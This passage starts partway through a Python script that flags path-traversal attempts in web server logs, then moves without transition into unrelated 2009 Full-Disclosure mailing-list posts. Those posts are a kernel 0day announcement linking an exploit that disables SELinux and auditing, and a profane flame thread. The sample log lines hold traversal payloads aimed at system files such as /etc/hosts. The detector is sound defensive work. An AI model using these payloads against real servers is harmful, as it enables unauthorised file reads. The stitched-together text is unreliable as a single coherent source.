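192.0.2.44 - - [16/Jul/2009:10:00:09 +0000] "GET /aa/i18nForward.do?p=%2e%2e%2f%2e%2e%2fetc%2fhosts HTTP/1.1" 200 412
192.0.2.44 - - [16/Jul/2009:10:00:12 +0000] "GET /aa/i18nForward.do?locale=en_GB&p=%252e%252e%252fvar%252fadm%252fmessages HTTP/1.1" 404 0
192.0.2.77 - - [16/Jul/2009:10:01:30 +0000] "GET /aa/i18nForward.do?p=/reservation/../home/index.jsp HTTP/1.1" 200 5120
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded '../' is seen in the clear."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def escapes_root(path):
    """True if walking the path segment by segment ever climbs above its start."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def find_traversal(log_text, endpoint="/aa/i18nForward.do", param="p"):
    """Return (client, decoded_target, status) for requests whose param escapes the root."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, _method, target, status, _size = m.groups()
        url = urlsplit(target)
        if url.path != endpoint:
            continue
        # parse_qs already decodes once; fully_decode handles further encoding layers.
        for raw in parse_qs(url.query, keep_blank_values=True).get(param, []):
            decoded = fully_decode(raw)
            if escapes_root(decoded):
                hits.append((client, decoded, int(status)))
    return hits


if __name__ == "__main__":
    for client, target, status in find_traversal(SAMPLE_LOG):
        print(f"{client} status={status} p={target}")
```

A flagged request that returned 200 is the one to triage first; the in-tree `/reservation/../home/index.jsp` request is not flagged because it never leaves its starting directory.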


[Full-disclosure] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable

2009-07-16 Thread Brad Spengler
Title says it all, exploit is at:
http://grsecurity.net/~spender/cheddar_bay.tgz

Everything is described and explained in the exploit.c file.
I exploit a bug that by looking at the source is unexploitable;
I defeat the null ptr dereference protection in the kernel on 
both systems with SELinux and those without.
I proceed to disable SELinux/AppArmor/LSM/auditing

Exploit works on both 32bit and 64bit kernels.

Links to videos of the exploit in action are present in the exploit 
code.

Greets to vendor-sec, 
-Brad




Re: [Full-disclosure] n3td3v is posting as ant-sec

2009-07-16 Thread Mario Alejandro Vilas Jerez
I didn't know n3td3v twitted about himself in the third person, thanks for
giving me a good laugh today :)

On Thu, Jul 16, 2009 at 6:00 PM, Ureleet urel...@gmail.com wrote:

 N3td3v made comment earlier today on Twitter about messing with the
 mind of his enemies. Gave him a dose of his own medicine. Now he is
 panicking.

 Twitter.com/n3td3v

 Got u kid. Fuxk off.

 O and don't follow him. He likes it. In fact, if u r a n3td3v follower
 unsub from his bullshit.

 I don't know if he's ant-sec, but I wuldnt b surprised.

 On Thursday, July 16, 2009, kfc.ru...@gmail.com kfc.ru...@gmail.com
 wrote:
  On Thu, Jul 16, 2009 at 2:54 PM, Ureleet urel...@gmail.com wrote:
  careful.  n3td3v has found his way back onto the list.  he is now
  posting as ant-sec.  he is hacking and spreading disinformation on
  full-d.
 
  Interesting theory, but do you have any evidence that backs this up?
  I'm not so sure if n3td3v is back, though it would be funny.
 




-- 
HONEY: I want to… put some powder on my nose.
GEORGE: Martha, won’t you show her where we keep the euphemism?